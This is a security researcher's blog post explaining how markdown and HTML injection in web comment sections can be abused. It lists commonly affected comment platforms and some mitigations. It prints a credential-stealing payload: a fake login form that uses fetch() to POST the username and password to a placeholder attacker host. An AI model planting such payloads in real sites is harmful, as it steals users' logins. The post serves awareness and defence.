Hackers Exploiting Markdown’s Functions to Run Malicious Campaigns

Kongsec
3 min readMar 13, 2024

Hello readers! I’m Aditya Shende aka Kongsec, Bounty Hunter, Biker, and Security Researcher from India. In today’s fast-evolving technological landscape, ensuring user privacy and security is more critical than ever. In this blog, we’ll explore a concerning trend in cybersecurity. Hackers exploiting ‘Markdown’ function to execute malicious campaigns. Join me as we delve deeper into the details of this threat, real-time hunting, mitigations, and detection methods.

Understanding Markdown in Web Applications

Markdown is a lightweight markup language that simplifies formatting plain text in web applications and digital platforms. It offers a user-friendly code that transforms plain text into polished content, making it a preferred choice for platforms like GitHub and Reddit. Despite its simplicity, Markdown is powerful, allowing users to create structured documents without complex HTML coding.

Key features include:

  • Headings: Denoted by a single #, indicating Heading 1.
  • Lists: Bullet points created effortlessly with a dash and space.
  • Text emphasis: Bold with double asterisks ** or italics with single asterisks *.

Markdown enhances readability and ease of use, making it popular for content creation across various digital landscapes.

Understanding the Threat: What? Who? Where?

What:

These kinds of attacks involve sending requests to vulnerable servers, turning them into attack proxies. Attackers embed malicious scripts, enabling data exfiltration with a simple click or mouseover.

Who:

Almost every server utilizing the markup feature is a potential target. It may include public third-party systems, internal organization systems, or services on the local loopback adapter of the application server.

Where:

Attackers often exploit markdown functions in sections like “Reply,” “Comment,” and “Share article.” For instance, inserting malicious tag-based payloads in comment boxes using markdown.

Escalated Attack: Auto-fill Passwords Capture

<b>Username:</><br>

<input name=username id=username>

<b>Password:</><br>

<input type=password name=password onchange=”if(this.value.length)fetch(‘https://YOUR-SUBDOMAIN-HERE.malicious-server.com',{

method:’POST’,

mode: ‘no-cors’,

body:username.value+’:’+this.value

});”>

This script captures usernames and passwords, sending them to the attacker’s server upon any data input in the password field.

Checking Affected Applications

  • Hunter.io
  • Wappalyzer
  • Dorking: Use dorks and Wappalyzer manually to check affected services.

Domains to Watch

  • forum.site.com: Discussions and conversations.
  • community.site.com: Building a sense of community.
  • help.site.com: Support and assistance discussions.
  • blog.site.com: Platforms for publishing articles or updates.

These domains encourage community interactions, making them susceptible to markdown-based attacks.

Common Service Providers :

  • Disqus
  • Commento
  • Hyvor Talk
  • Muut
  • IntenseDebate
  • Livefyre
  • GraphComment
  • SolidOpinion
  • Coral by Vox Media

Mitigation Steps:

  • 1. Automated Flagging: Service owners can implement automation to flag malicious embedded comments
  • 2. Blacklisting Domains: Blacklist potentially harmful domain extensions (e.g., .net, .sh, .xyz) often used in payloads.
  • 3. URL Restrictions: Disallow servers from reading embedded URLs in payloads to prevent external service interactions, mitigating risks like Origin IP exposure and internal headers disclosure.

As cybersecurity threats evolve, it’s crucial for service providers and users alike to stay vigilant and implement robust mitigation measures. Let’s work together to make the digital landscape safer for everyone. Stay secure!

--

--

Kongsec

#kongsec | Solo Bounty Hunter | Function Exploits and Report Crafting | Bikes | Not a XSS guy | Own views | Bugcrowd Top 100 l Top 10 P1 warriors | Biker